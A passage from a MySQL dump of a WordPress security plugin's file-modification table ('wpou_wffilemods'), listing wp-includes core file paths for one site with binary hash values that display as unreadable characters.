('„ÀÊÆÄÕPU¡…ac—Ó', 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '³YA’ÀG=bÑu¡”÷', 'zñ,Í¥²èàt	<{@Y{úiyƒ¬s˜ŠÝc¢(SýL', '', 0, '?'),
('ßÄµ>“„#B§¾bóñÇ', 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' Û“œÑôGÿc,«™=c^¥', 'ìÛä‹«Gêc‹Àïèt(5\n,9%Ù÷—£Êå)ïe', '', 0, '?'),
('½¯!Üh>„iq…8tÕÂn', 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ö\0ç¤Ù>ö¤@UeììU', '®È›pñâ¡Ë„o<¸§O\n¼†Oo{Öw=—S', '', 0, '?'),
('Qï10ØòéýöGŽÿ,', 'wp-includes/sodium_compat/src/Core32/Curve25519/H.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/H.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'x} ó’”ïpc° KàOÿ', '(H>Éö0€}¾Í8:e…)ï¼´¬ð™NÁ/Îzì', '', 0, '?'),
('nÿ®Û—ÔðvXH)é', 'wp-includes/sodium_compat/src/Core32/Curve25519/README.md', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/README.md', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Y¢ªÏ›ÑvjŸ×\nÀ…Ï', 'ãSÓx–^öV>mÐ!-ªqì÷ÌñDÙeVÑßÎÈè', '', 0, '?'),
('\0ž9ó¿k5&åÙ™ 7N', 'wp-includes/sodium_compat/src/Core32/Curve25519.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Èð43kŒ&t÷8‹p¢ôŸ', 'Ðjýª+ùÓJLÂ¦«{¢ãá×¹\Zô—ÇI]íÙ‹Å=ìÀ', '', 0, '?'),
('ðI/\Z³Nç2é÷öáÉñp', 'wp-includes/sodium_compat/src/Core32/Ed25519.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Ed25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ä*®ÿþ²¦ëÎeÿì®Å/', '1¯Èh¹eä¢+ïÉ:²zìa‹ðé÷ƒÍ£4@í', '', 0, '?'),
('"ÞÒ0Ø\0“Lµ''Mü×', 'wp-includes/sodium_compat/src/Core32/HChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/HChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9˜5£ÀeÏf”‹#®Ï', 'èèi˜Ä\rCáý¢"Ô³Á\r4†®8ÀcöÑSÝâ', '', 0, '?'),
('*Ó`U¨z»]"L%—1­ü', 'wp-includes/sodium_compat/src/Core32/HSalsa20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/HSalsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '´Ñ/Dzxþ¶Ç‚Éâ­ü', 'ßÏî,ÇèÕßÊE¬ù¿{Žî0/m›aÓXˆi‰àÑ', '', 0, '?'),
('‰¸­ÐZ|òò0²75ÿoë', 'wp-includes/sodium_compat/src/Core32/Int32.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Int32.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'sÜÁúiQý­$ßgŠ…Fr', 'ÈMÇ=ÒcS§á~[\rå<ì)Ç–”3O{ñxÚ¾\0–w', '', 0, '?'),
('(ÝÆLS[šöWl#“ð¦ó ', 'wp-includes/sodium_compat/src/Core32/Int64.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Int64.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢Â×Ð¥‡x¶	^Û5üÊ', 'HÄ3Š³‡×yËä&ÇkÀŠ3§‚úÜ}‚ƒ:', '', 0, '?'),
('‘ãue{X¡1ì‚ÑÒ', 'wp-includes/sodium_compat/src/Core32/Poly1305/State.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Poly1305/State.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'DM"EÔ4bÑœÜB¿‘\0', 'ÞáæÙ"ŸC¨ùYªW6AÔ\Z¿ÇðˆpÇý7\rÏ ðð', '', 0, '?'),
('ÀÎV\ZFÃÓ\0áÌŽ|€', 'wp-includes/sodium_compat/src/Core32/Poly1305.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Poly1305.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ß@BgéÁ»EJøÆ½H¶', 'i§í¦|\\I¦—ÇñE‰‘ŒÉ_•¬Xç¶ˆj’Ù', '', 0, '?'),
('—í|œ~”‰÷Éð‡åô', 'wp-includes/sodium_compat/src/Core32/Salsa20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Salsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')6´¥):öÛÍð¸Žý®â', 'H0¢“L³Ñ—?¸ãž¹.1ÇMòIeÓÉÙ£’', '', 0, '?'),
('w‰ÁÃú+\0ã˜òì2ÎR', 'wp-includes/sodium_compat/src/Core32/SecretStream/State.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/SecretStream/State.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\Zjoñ\0˜ºy,¨*•}c', '2p"Wjá„€—ìsâlf&S@Ç[Ç\\‹ª"WÆ', '', 0, '?'),
('q·0ø“ÄœÁ¿±›ì5', 'wp-includes/sodium_compat/src/Core32/SipHash.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/SipHash.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ª5O&?«Eº	»»%', '^%%ŽhTŠý,‘æû¨³¾k2¬È®n=n%:Òï', '', 0, '?'),
('`ý}+í6±L-q[©®$', 'wp-includes/sodium_compat/src/Core32/Util.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Util.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Œ£1î`£Ø¯0›¡£Ñç', 'à¤qÆ–•‚×â‰%/Ýy¤g’rwÃ›‹\rËLR>=Y', '', 0, '?'),
('öÈ@æ}Ÿ~¥4G‘v<‚m', 'wp-includes/sodium_compat/src/Core32/X25519.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/X25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'gé¥bñf>Ž•ë½=™²·', '¬¾“šßº×`Ï''¸‹ƒç›±“ÍÐ–x#i§ÔÅ#ª', '', 0, '?'),
('âU6Ï…sÄdÂ~x¡ýð', 'wp-includes/sodium_compat/src/Core32/XChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/XChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¿YÎ%RSÇÿ›ÎñïTY', '`-¬ù³îÃÀ ŸÔJ·¢\0â¤PÌäÁ¤#M"åµ&oï', '', 0, '?'),
('hZ[ý€=—ïw–rŒ', 'wp-includes/sodium_compat/src/Core32/XSalsa20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/XSalsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ü\\™®”ñõà:R/â+', 'ÞÉ«¡ÿ‡¨ÐøçÌ:ª»¶jNêmm©ú†½R·ª¸[', '', 0, '?'),
('ÍK=­Xìa:Ä''5¼', 'wp-includes/sodium_compat/src/Crypto.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Crypto.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '-pü˜ÿ‚\0EÈcbœc¥', '"ÚÌ˜ŸLŽ×Ù!Ò{rDnPz^ôÚXòjôÄûLk', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('eª˜lsUO|°R}Ü“i', 'wp-includes/sodium_compat/src/Crypto32.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Crypto32.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'I\r}jŒÇŠQX]m“ÿ', 'É±ùÅä±ƒFn÷ž»2c.nßM±íÚ£² A¿µ¿', '', 0, '?'),
('Ã`~|D%EH´wOº¤ƒè', 'wp-includes/sodium_compat/src/File.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/File.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '³\r‹†Øõ^ž™—¸˜\Z2', 'o%ÆñEçsVFWWñ×öM]b ÚòBX0.y', '', 0, '?'),
('À«ÍxËOW\rƒ ¨ Ç', 'wp-includes/sodium_compat/src/PHP52/SplFixedArray.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '©£Ø¦TáÐ¬©Ô„cì/¥ô', 'TJ¶)‚,8ãq²@©fÌ<DÚ›”Ö\rxÝÈåÄF‰', '', 0, '?'),
('uÇm-OÔÜ''ßë]ƒ#', 'wp-includes/sodium_compat/src/SodiumException.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/SodiumException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '«HDfé×ae¤ãÔz°R', 'ã¶œ\\‚©L>LöN-@G''Ä×tmGºãi€‡kRß®g\0', '', 0, '?'),
('Xê=Ó2h4÷/{ +', 'wp-includes/spl-autoload-compat.php', '/home/equipm11/public_html/happythinking.com/wp-includes/spl-autoload-compat.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6õuõ{ît¤Õò‰›', 'çË,ÉZ\rM	>Ü…€àgïpò/é	Z\Z#`!û.', '', 0, '?'),
('ïÈRöa~ñj,rVO', 'wp-includes/style-engine/class-wp-style-engine-css-declarations.php', '/home/equipm11/public_html/happythinking.com/wp-includes/style-engine/class-wp-style-engine-css-declarations.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '³ÿ­‘¦8µ®LáKäd™¥(', '3#AjEr™5]ŸššSÊtÍuÕf¶Å)sûÃÇ±', '', 0, '?'),
(' fŽ¹=*…bOsÈ', 'wp-includes/style-engine/class-wp-style-engine-css-rule.php', '/home/equipm11/public_html/happythinking.com/wp-includes/style-engine/class-wp-style-engine-css-rule.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÊÂÛC`Ã†×ãB×U[Z¤U', 'µÄF]ÈŒW÷,°ŸÉJe[œIàŒfáÆòýfÄ’¹t', '', 0, '?'),
('ßÀf«y¡Ú¸yêY¨nÄC÷', 'wp-includes/style-engine/class-wp-style-engine-css-rules-store.php', '/home/equipm11/public_html/happythinking.com/wp-includes/style-engine/class-wp-style-engine-css-rules-store.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '®Ch¬ÄMôå_pêŸY', '0&„Fo>¢I~Éø€Ð_ÔB×C:ÆÍ3¾ªnúk6ËCáß', '', 0, '?'),
('´vë+[.I$·]ñTˆ', 'wp-includes/style-engine/class-wp-style-engine-processor.php', '/home/equipm11/public_html/happythinking.com/wp-includes/style-engine/class-wp-style-engine-processor.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹?%eÌÌ¬ÂÙC8ˆ­9', 'ºv÷’Â¤“ù{Ô×DémÚÃjá\nËqöüEWôay[', '', 0, '?'),
('XJÊç\nýsp3t9!Òˆ', 'wp-includes/style-engine/class-wp-style-engine.php', '/home/equipm11/public_html/happythinking.com/wp-includes/style-engine/class-wp-style-engine.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'm½g»3uO±&”6[J', 'ŠÄ]Š˜ÞZÄ"š	]È…7¡O®Aá,dÖém“M–…v', '', 0, '?'),
(':*¯+i*Þi2’ú}Q', 'wp-includes/style-engine.php', '/home/equipm11/public_html/happythinking.com/wp-includes/style-engine.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '-±®;µHµx 0¦óRc', 'Ÿû`QÓ`I|‚Zš¥õSÐuÃ”¶îtì‚šçZYI\\í', '', 0, '?'),
('ïÑX=U¡pfp¾€ÁZ', 'wp-includes/taxonomy.php', '/home/equipm11/public_html/happythinking.com/wp-includes/taxonomy.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŽDøAp¥ðéµo»¨‹', '"}Ö{gˆoî®VˆKW†tº¾¡ó…ÝåËˆPó', '', 0, '?'),
('ÓMÞp–\0¨¯Í`künP', 'wp-includes/template-canvas.php', '/home/equipm11/public_html/happythinking.com/wp-includes/template-canvas.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶bÎ\\âK“¨g5vÑmx', 'Ñ=\0Ùà‹—¾ïŒ‚Ä†ª}}8\rq>üâª&á', '', 0, '?'),
('„:+[õ¹g¾¦CZÝØó’', 'wp-includes/template-loader.php', '/home/equipm11/public_html/happythinking.com/wp-includes/template-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'þzÈ	Ò¿öèÜŒ~ÎèÊ', '¿„''4Äh ²ä±º˜¥[£‘ËÙE·ˆ%’¬J©Hú', '', 0, '?'),
('ˆ:=%ÆÌâ¾ù MÔÛµ', 'wp-includes/template.php', '/home/equipm11/public_html/happythinking.com/wp-includes/template.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'wôæ‰ØŸ‹\0\nÂÇ8', 'l''	\nÝ< TÆ:/U1•OB¥¿ßCIÆí»ˆwâb', '', 0, '?'),
('>hÐ©ìXX*ÿv1•©¹', 'wp-includes/theme-compat/comments.php', '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/comments.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÿUò×ˆÒ´¨óË\0', 'z;‡h| ýÖó…ŠtxÈ˜ ç¢‰\\çbd!oriÈ>jr', '', 0, '?'),
('"8A\n=ò®á‡¼fp5', 'wp-includes/theme-compat/embed-404.php', '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/embed-404.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Í;ØÀÐC†Q5ÿzŒ—', '4–ã7ËÄÅ:V¢]­L“,«B¦àÂR$2pz›ñ‡¹Ì', '', 0, '?'),
('fÖˆó½ù¦¼VíÔ¹)ä9', 'wp-includes/theme-compat/embed-content.php', '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/embed-content.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÌÙ÷meÞðæ8¦ÐóÂó›', '}Ec¼£îzÀ]#în¢¸êýw?yÚàR‘a©–0Þ…6', '', 0, '?'),
('ý+q^e·•éãguÏF6\n', 'wp-includes/theme-compat/embed.php', '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/embed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÈÅ¢s¾^Ðô»q¢cbÿ', 'WõÜô5T¦pÁª;-¥n¬ˆ0»a‹•º©O\nÓô¦’', '', 0, '?'),
('Ím¥L0N"ÈT~ìbÜ', 'wp-includes/theme-compat/footer-embed.php', '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/footer-embed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„õZÜ«„ò.“+–j', 'ƒi§ÉDÿAJöÏˆ;v,gcÌ%‘çˆÑ	^#', '', 0, '?'),
('þQÖ¿6“Èyqä¢88', 'wp-includes/theme-compat/footer.php', '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'è^Xµ°ôé·{¨äªéQ¸3', '“nt›Îÿ¿‡2ªŸ§. ¯|?<—’mfYEõô…~„I', '', 0, '?'),
('&ÎvA¹öQÍôc‰Úqw8,', 'wp-includes/theme-compat/header-embed.php', '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/header-embed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Omz8Ê™FÚ°Ï', '°£õÄò})d!q	,@,×Ñj«ñv	ÝßéÄE”êí', '', 0, '?'),
('LäåbPÞ-I×­1f€', 'wp-includes/theme-compat/header.php', '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/header.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '©G¢{\rÓ(7NDÅ:WÊ', 'qÊ2åÕµÂÐûÏ¢>rã‘7Njè¤	D—^ƒïA5\r', '', 0, '?'),
('ã0—;ê-,ÓAÞEyæ', 'wp-includes/theme-compat/sidebar.php', '/home/equipm11/public_html/happythinking.com/wp-includes/theme-compat/sidebar.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\\ÞâÈäŠç¤tÍ¥', '1=†U©gžPv“Xª3aË@®¸ šb%ìù½ºoÔ\\â''', '', 0, '?'),
('Š•>ð`Pöµê@ŒÔß¹', 'wp-includes/theme-i18n.json', '/home/equipm11/public_html/happythinking.com/wp-includes/theme-i18n.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶ZùÁN½B‘C0F_N', 'AŽÀ7jÌ9˜áˆÔŒ3a±üGOKKéª”c', '', 0, '?'),
('Âi9º$:¹¼Óžl¯{Ñá', 'wp-includes/theme-previews.php', '/home/equipm11/public_html/happythinking.com/wp-includes/theme-previews.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'É!ÏÏƒûž#Ôx0,OY¿', 'ò]ÄH´˜[³lô\r.\rcC©«\Zå˜¿\Zç‘ð3úY›P', '', 0, '?'),
('šß(B«A!¬ªž×ÛÜÝöñ', 'wp-includes/theme-templates.php', '/home/equipm11/public_html/happythinking.com/wp-includes/theme-templates.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'I¥g~‹¡tú”Áw’Î', 'H]l)RkZ‹Å›ô†e³¶[ÀÓë§ÞÌ~¿‚R—së ƒ', '', 0, '?'),
('3åä°Ôà¤”Oì5(ß', 'wp-includes/theme.json', '/home/equipm11/public_html/happythinking.com/wp-includes/theme.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'së júLú]”Änã#–', ']CÓŽpcŸÔ×vö.´\0®ò3ºý¹ãšsv€ ½"', '', 0, '?'),
('“XèV×˜O|8}š€‚', 'wp-includes/theme.php', '/home/equipm11/public_html/happythinking.com/wp-includes/theme.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¤¬gÉ\\ª•ÃQrº;¼', '|Æ½òA¬Já\raÒõu\\âhJÈzV§év•_ŽûÑ''ð', '', 0, '?'),
('öÊí†+¢šÇqÉpW£Ã', 'wp-includes/update.php', '/home/equipm11/public_html/happythinking.com/wp-includes/update.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ot]i{u­®&hXíÆrO', '\\°k+Ÿ“©ÇHvÑQPñM`¾ù…¸·Y(Âç•', '', 0, '?'),
('k½úBËžãb=y†Ú', 'wp-includes/user.php', '/home/equipm11/public_html/happythinking.com/wp-includes/user.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'sÌ³Tx¥ý:^%ä%’', 'é^\\ìP’«4Ø…õ×¤X qûˆÔÀÅÈ¿–±4', '', 0, '?'),
('g+yr‰äÐq„€ö€D©´/', 'wp-includes/vars.php', '/home/equipm11/public_html/happythinking.com/wp-includes/vars.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'FíÃ1íì"„:ÓÒ»àC\nI', 'ÓK-á{½’90I5šŒÖEI"E=m›4Dt|ÖôÝ', '', 0, '?'),
('5Z¬ÌäàSÎ¼ãvÙ`6—9', 'wp-includes/version.php', '/home/equipm11/public_html/happythinking.com/wp-includes/version.php', 0, 'èN¨» ¨J°óKÊAÜþƒ', 'èN¨» ¨J°óKÊAÜþƒ', 'Ü÷{ão“$Ú…è[©³¦žÖü¢¢ú¡œ¬6õŠHF©Ãñ', '', 0, '?'),
('Y,Qpêgmu#—eŸ±¼~', 'wp-includes/widgets/class-wp-nav-menu-widget.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-nav-menu-widget.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'üæ-Îù„Ý("vïúV>ð', 'N8ŠX€¬<Ù‡µŸ\\Õ˜Çñ1ÐúvvFúÿ7ñ«®', '', 0, '?'),
('ñ±TYÛPpEñw†“', 'wp-includes/widgets/class-wp-widget-archives.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-archives.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+‡É¯Ò@tÐ@øXñ&', 'h÷ÄŠŒÖZ±Öx:µ‰Çßr8Ë¾@Þ¾ûÍ“$£KÆ', '', 0, '?'),
('Ä\0UÎÆÍËöaS­Ì', 'wp-includes/widgets/class-wp-widget-block.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-block.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'gGšP''#âƒDa§x­\\', '¦|ñ°X•KíeQù®ÐLK‚ü»±øÙï[îu\0Ã@R', '', 0, '?'),
('I0Åó¹Sþ$2£TÐüB*', 'wp-includes/widgets/class-wp-widget-calendar.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-calendar.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'pÈÄ÷v°Ú:¼2Åhv', 'Îã}\Z))$G@¶¾èU(½\r©J@ÊµÃƒšIÀ§', '', 0, '?'),
('RãH\r0ü!„d‘?c&', 'wp-includes/widgets/class-wp-widget-categories.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-categories.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Þô†bo×fOÕ³K', 'ôjc\nóyÄ;~;Ø3RH¬3z4Uð¡²²h‰ûG', '', 0, '?'),
('¡jðò—\\ïÉÄ¦<yãpƒ', 'wp-includes/widgets/class-wp-widget-custom-html.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-custom-html.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '	é.4,À–ÞBó›| _', 'B\\7h­¼®³µGjDB{%n·ÈŠ‹ª“}¤mWØ%õ)', '', 0, '?'),
('&é¥±†˜ñòW‘³Ø€Ó|¡', 'wp-includes/widgets/class-wp-widget-links.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-links.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Á#ãæÌòF”¨>Xžnl', 'Îì‡‰¶Ã,xàë¢-Û©DOá,°¥7ÑˆÊQå', '', 0, '?'),
('¦á½ˆËÛŽØ5f?žhk', 'wp-includes/widgets/class-wp-widget-media-audio.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-media-audio.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Þ,{¸H-]meZÓyú', '3ÀìP×U‡{gnÒ®Ÿä°Š\nà‚¥z‡›	"Ü¼Ü', '', 0, '?'),
('°Ùv''j@Ô-Ìÿ²*', 'wp-includes/widgets/class-wp-widget-media-gallery.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-media-gallery.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'óWfLZè±dèçR.¤É<', 'oÿíz=n¨Ò–×J§Š¬¬ä!àªÓÜ=‡) ë+', '', 0, '?'),
('PJ’~]øú; ž‹`y', 'wp-includes/widgets/class-wp-widget-media-image.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-media-image.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÛS…Õ”Fiè¥æÉ“n', 'Ê‹4Êpq%ÜÈÙVlnt#¢aŠÅLtl5,;\n', '', 0, '?'),
('÷Æ_wïÆŒè›ßžÐ', 'wp-includes/widgets/class-wp-widget-media-video.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-media-video.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'vIšß1æ8ÒKõ{þ÷ç', 'NÐIÙ7 ¿r\ræ/K3d¹}I*oéï‰Å½¼]™', '', 0, '?'),
(']ƒŠÔNÎ×JjÓŽe½£‚', 'wp-includes/widgets/class-wp-widget-media.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-media.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'dûLÎt­«<‘ª°', 'Ló}KöÂf\\ºA¼Ré ïÅ­¹(˜s¡Öÿi÷{ÒÇäU', '', 0, '?'),
('«nÖ¢¡ù\r’V5‘‹,Ù', 'wp-includes/widgets/class-wp-widget-meta.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-meta.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÊŠjô+(,¸^Šb·ÿ(', '¿ÆPL+wÁit¥Š½Z¶¢dþˆÃkZ{XŒV`Åt”', '', 0, '?'),
('K¯cŽŠ#2s’/(…"Ž', 'wp-includes/widgets/class-wp-widget-pages.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-pages.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¨ärèáL›ZT¼tÏ›ÏR', 'â*ÛÂÀ"#å€®´Uî8÷¨¦cÿÔ*[‡æj''', '', 0, '?'),
('¤Ì6†èó~eª{Ð".w', 'wp-includes/widgets/class-wp-widget-recent-comments.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-recent-comments.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '<°FÈÅö`–ýÂÎãŠ÷', '—ËéÝÔƒ‹OËh‡	®Ÿ8qÄ‚p£€÷¨=F[r', '', 0, '?'),
('l/\nÑÔ€°WÁÍ±-cÏ', 'wp-includes/widgets/class-wp-widget-recent-posts.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-recent-posts.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'I%*ÕŠ1¡¿9Ÿðñ', 'u÷¢×›wëŸîx¡mIé{‡Öcºu€ló”²Å', '', 0, '?'),
('y7¯ÐMAä@ š…', 'wp-includes/widgets/class-wp-widget-rss.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-rss.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9s''é’¾ÒTå \nÑJ2', 'õAÇBª‹m‰øqþ‘·AìzœíiZuûÃÇõÛ\\Ž×', '', 0, '?'),
('F\rºxÓw~Û\rÜ±´ç\n¦', 'wp-includes/widgets/class-wp-widget-search.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-search.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’´IÕS4¾&kûëD', 'ë‘°è iuÒÍ6#IƒB3ƒfØAý\\\n<W PAA£', '', 0, '?'),
('¢-‰[ipùœ\\^˜ØóÁ]', 'wp-includes/widgets/class-wp-widget-tag-cloud.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-tag-cloud.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'iôl”Â¹Ü+ÐXÀ—ZÜš', 'p­^B­’ó&¸ƒüÕÑó¬RO­ÖÞŽýD\0', '', 0, '?'),
('\0É ‰Ÿk~‚£U5T', 'wp-includes/widgets/class-wp-widget-text.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets/class-wp-widget-text.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'õ”ª\nùdGÖ¼kŽÙ‘Ü', '8OhºªÕ+‚DÐ®ÏeæÄö:à$ „ù$Åb`.´!', '', 0, '?'),
